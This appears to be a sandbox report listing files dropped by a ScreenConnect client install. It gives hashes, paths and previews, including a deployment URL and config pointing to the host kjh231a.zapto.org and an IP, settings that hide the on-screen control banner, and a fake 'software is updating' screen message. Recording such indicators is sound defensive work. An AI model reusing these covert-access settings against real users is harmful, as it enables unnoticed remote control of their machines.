                                                                                                                                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10+HwercYn:rHy2DLI4MWoHO8L9cAgRMZRCl1FHcY
                                                                                                                                                                                                                                                        MD5:17702A9E63BED7438F3217D594D6E35C
                                                                                                                                                                                                                                                        SHA1:7C556F344A57D5933A528F8B8CFD0363F15AE0E3
                                                                                                                                                                                                                                                        SHA-256:8BFD7D9E0BAC6BDE538DFBE31E8919933547F30248E747C5B38EB84472DF3701
                                                                                                                                                                                                                                                        SHA-512:642BB2D85ECB653DA779AFFAA4285612BC7EB08383967DB16D9F9CA709F6A46280E6E6C7605E850E5AEC28043828826CA6948982591C310374119785784B303B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.?....=Software is updating... Please do not turn off your computer!..
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):256
                                                                                                                                                                                                                                                        Entropy (8bit):4.878405169379307
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJkw:rHy2DLI4MWoj12eKfKCKB
                                                                                                                                                                                                                                                        MD5:B5450F2285052D7D31714E92BAE6143E
                                                                                                                                                                                                                                                        SHA1:0904C6FE250983A97D5210DFEACCB1C1CF34D643
                                                                                                                                                                                                                                                        SHA-256:23054E289EB585EB0314C44FD753ED3803C012E06B954926F3FC7167A370F928
                                                                                                                                                                                                                                                        SHA-512:79DA469F0C4ACB50D9B399086ED171C69E00C4CF5CB8A2089FD49F5864C1BF46E8434FB23CD210ABB83B88FF06E435A92C8E926B435BFB03EA207D5D7069723E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):50133
                                                                                                                                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):26722
                                                                                                                                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2089
                                                                                                                                                                                                                                                        Entropy (8bit):4.688974504275539
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHK:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHY
                                                                                                                                                                                                                                                        MD5:6E88FAD97F4CFC0339D8D71F55326EDF
                                                                                                                                                                                                                                                        SHA1:7FE09E6D87B7CA210C8D7AFA9D69380528A6D4F2
                                                                                                                                                                                                                                                        SHA-256:F09E170444003576AD24985C8B4873E7CBDC18863A4943A1FDEB0E3249812806
                                                                                                                                                                                                                                                        SHA-512:023175F24C652E73946A01DB84579BAF00D4447AFA01CD2EA09820964DCA10D9C24C7DD7F37109A836996477B4C9804B75830C95A790B5598564395272F98A15
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):562
                                                                                                                                                                                                                                                        Entropy (8bit):5.071856827733907
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDOt/vXbAa3xT:2dL9hK6E46YPoXovH
                                                                                                                                                                                                                                                        MD5:9CC4A91172217A43CDA36ED88FA9CD64
                                                                                                                                                                                                                                                        SHA1:1784CA72723E2C19B5BE41EB0FD062794FD09090
                                                                                                                                                                                                                                                        SHA-256:B241E5DA017F6A21D5F7E37A01CFC5C48B3A3F46E3824FCA78420F3A7AA3694B
                                                                                                                                                                                                                                                        SHA-512:30F2A2B2A3BC5DA6E1294F9F91CAD485BDF1413158FD4C2BD70F9B4DEB64000B019FF6E883DBEDF9B3D8FDCF050A8F61B0F6660ED50290300AA48939A22D11AD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a53</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                        Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                        MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                        SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                        SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                        SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1373
                                                                                                                                                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):1662
                                                                                                                                                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):847
                                                                                                                                                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14968
                                                                                                                                                                                                                                                        Entropy (8bit):3.818129733327157
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:t6BKasddrv5yInMSiYkbBBaOy0lPsddrv5yInMSiY3uEM1dE/58+kxpsddrv5yIW:nj5y8VkbaBj5y8VeEMPE9j5y8VNJLEv
                                                                                                                                                                                                                                                        MD5:DFC4AE709D05AB3AD6763E4DA93F0034
                                                                                                                                                                                                                                                        SHA1:7F244226A9BCF0E716F0881F57FF28AAC40BF8A9
                                                                                                                                                                                                                                                        SHA-256:D783A7EFCDA54618FE932B8CD674F86CB81ADDEA943FC59189EB1988941FE9BE
                                                                                                                                                                                                                                                        SHA-512:34E8EEF237968286F6F219D75D690F496FAC73416D496732FEA2A68D236E7B79362120962BC9632F401373616C9E9749C0B03227D6C78A60296EEC6ACDDF81C7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.s.e.c.u.r.e...s.t.a.n.s.u.p...c.o.m./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.k.j.h.2.3.1.a...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.4.1.b.b.4.5.1.f.-.2.1.e.9.-.4.1.6.5.-.b.8.b.
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):118229
                                                                                                                                                                                                                                                        Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                        MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                        SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                        SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                        SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                        Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                        MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                        SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                        SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                        SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                                        Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                        MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                        SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                        SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                        SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                        Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                        MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                        SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                        SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                        SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
